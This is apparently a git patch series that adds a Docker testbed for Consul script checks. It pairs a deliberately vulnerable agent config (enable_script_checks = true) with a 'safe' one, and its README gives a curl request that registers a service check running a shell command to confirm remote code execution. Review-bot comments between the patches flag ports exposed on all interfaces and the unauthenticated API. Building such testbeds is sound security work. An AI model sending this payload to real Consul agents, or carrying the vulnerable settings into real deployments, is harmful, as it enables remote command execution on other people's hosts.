From e340b7030a02da2b880ab6364ec91e54e026dff4 Mon Sep 17 00:00:00 2001
From: Robert Dick
Date: Fri, 29 May 2026 09:29:50 -0400
Subject: [PATCH 1/3] added testbed for consul script checks
---
 hashicorp/consul/README.md | 23 +++++++++++++++++++++++
 hashicorp/consul/docker-compose.yaml | 21 +++++++++++++++++++++
 hashicorp/consul/safe.hcl | 11 +++++++++++
 hashicorp/consul/vuln.hcl | 11 +++++++++++
 4 files changed, 66 insertions(+)
 create mode 100644 hashicorp/consul/README.md
 create mode 100644 hashicorp/consul/docker-compose.yaml
 create mode 100644 hashicorp/consul/safe.hcl
 create mode 100644 hashicorp/consul/vuln.hcl
diff --git a/hashicorp/consul/README.md b/hashicorp/consul/README.md
new file mode 100644
index 00000000..a29b8161
--- /dev/null
+++ b/hashicorp/consul/README.md
@@ -0,0 +1,23 @@
+# Consul Exposed UI (Exposed API)
+This testbed contains vulnerable and safe containers for Consul. The vulnerable version has `-enable-script-checks` and the safe version lacks it.
+
+
+## Docker Compose
+```
+docker compose up
+```
+The vulnerable service will be on port 8081 and the safe service will be on port 8082.
+
+## Confirming the vulnerability
+
+```
+curl -H 'Content-Type: application/json' -X PUT \
+ -d '{
+ "Name": "test",
+ "check": {
+ "Args": ["sh", "-c", "curl curl "],
+ "interval": "10s",
+ "Timeout": "600s"
+ }
+ }' localhost:8081/v1/agent/service/register
+```
\ No newline at end of file
diff --git a/hashicorp/consul/docker-compose.yaml b/hashicorp/consul/docker-compose.yaml
new file mode 100644
index 00000000..e90a963d
--- /dev/null
+++ b/hashicorp/consul/docker-compose.yaml
@@ -0,0 +1,21 @@
+version: "3.8"
+
+services:
+ consul-vuln:
+ image: consul:1.2.3
+ container_name: consul-vuln
+ ports:
+ - "8081:8500"
+ volumes:
+ - ./vuln.hcl:/consul/config/vuln.hcl
+ command: agent -config-file=/consul/config/vuln.hcl
+
+ consul-safe:
+ image: consul:1.2.3
+ container_name: consul-safe
+ ports:
+ - "8082:8500"
+ volumes:
+ - ./safe.hcl:/consul/config/safe.hcl
+ command: agent -config-file=/consul/config/safe.hcl
+
diff --git a/hashicorp/consul/safe.hcl b/hashicorp/consul/safe.hcl
new file mode 100644
index 00000000..4cef9455
--- /dev/null
+++ b/hashicorp/consul/safe.hcl
@@ -0,0 +1,11 @@
+datacenter = "dc1"
+data_dir = "/consul/data"
+
+server = true
+bootstrap_expect = 1
+
+enable_script_checks = false
+
+client_addr = "0.0.0.0"
+
+ui = true
diff --git a/hashicorp/consul/vuln.hcl b/hashicorp/consul/vuln.hcl
new file mode 100644
index 00000000..4797ffa8
--- /dev/null
+++ b/hashicorp/consul/vuln.hcl
@@ -0,0 +1,11 @@
+datacenter = "dc1"
+data_dir = "/consul/data"
+
+server = true
+bootstrap_expect = 1
+
+enable_script_checks = true
+
+client_addr = "0.0.0.0"
+
+ui = true
From a7ff95e6fe16114f6458a4dd4d806b6369af226d Mon Sep 17 00:00:00 2001
From: Robert Dick
Date: Fri, 5 Jun 2026 07:44:30 -0400
Subject: [PATCH 2/3] Update hashicorp/consul/README.md
Co-authored-by: Giacomo Coluccelli
---
 hashicorp/consul/README.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/hashicorp/consul/README.md b/hashicorp/consul/README.md
index a29b8161..750b8eee 100644
--- a/hashicorp/consul/README.md
+++ b/hashicorp/consul/README.md
@@ -15,7 +15,7 @@ curl -H 'Content-Type: application/json' -X PUT \
 -d '{
 "Name": "test",
 "check": {
- "Args": ["sh", "-c", "curl curl "],
+ "Args": ["sh", "-c", "curl "],
 "interval": "10s",
 "Timeout": "600s"
 }
From 61a9724c7066f56e8a98381fdf7fead4225ada5b Mon Sep 17 00:00:00 2001
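Review bot: Both `ports:` entries publish the agent's HTTP API on every host interface, so the deliberately vulnerable agent behind 8081 (and the unauthenticated "safe" one behind 8082) is reachable by anything that can route to the host, not only by the tester on the machine. Unless the testbed is meant to be exercised from other hosts, bind the published ports to loopback: `- "127.0.0.1:8081:8500"` and `- "127.0.0.1:8082:8500"`. The top-level `version: "3.8"` is obsolete for current Compose and only produces a warning, so it can be dropped. The Docker Hub `consul` repository has since been superseded by `hashicorp/consul`; if the pull of `consul:1.2.3` fails the pin may need to move there — worth confirming.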
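Review bot: Nothing in safe.hcl records what "safe" covers: with `client_addr = "0.0.0.0"`, `ui = true` and no ACL configuration, this agent still serves its HTTP API and UI unauthenticated on every interface, and only the script-check path is closed. A header comment would stop the next reader from reusing the file as a hardened baseline, e.g. `# "Safe" only with respect to script checks: the API/UI stay unauthenticated (no ACLs) and listen on all interfaces.` The companion vuln.hcl differs only in `enable_script_checks = true` and deserves a matching comment stating that it is intentionally vulnerable and must stay on an isolated testbed network. Newer Consul releases also offer `enable_local_script_checks`, which permits script checks only from local config files rather than the HTTP API; the pinned 1.2.3 image predates it, as far as I recall, which is presumably why the testbed pins that version.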
From: Robert Dick
Date: Fri, 5 Jun 2026 07:44:36 -0400
Subject: [PATCH 3/3] Update hashicorp/consul/README.md
Co-authored-by: Giacomo Coluccelli
---
 hashicorp/consul/README.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/hashicorp/consul/README.md b/hashicorp/consul/README.md
index 750b8eee..4ebb625c 100644
--- a/hashicorp/consul/README.md
+++ b/hashicorp/consul/README.md
@@ -17,7 +17,7 @@ curl -H 'Content-Type: application/json' -X PUT \
 "check": {
 "Args": ["sh", "-c", "curl "],
 "interval": "10s",
- "Timeout": "600s"
+ "timeout": "600s"
 }
 }' localhost:8081/v1/agent/service/register
 ```
\ No newline at end of file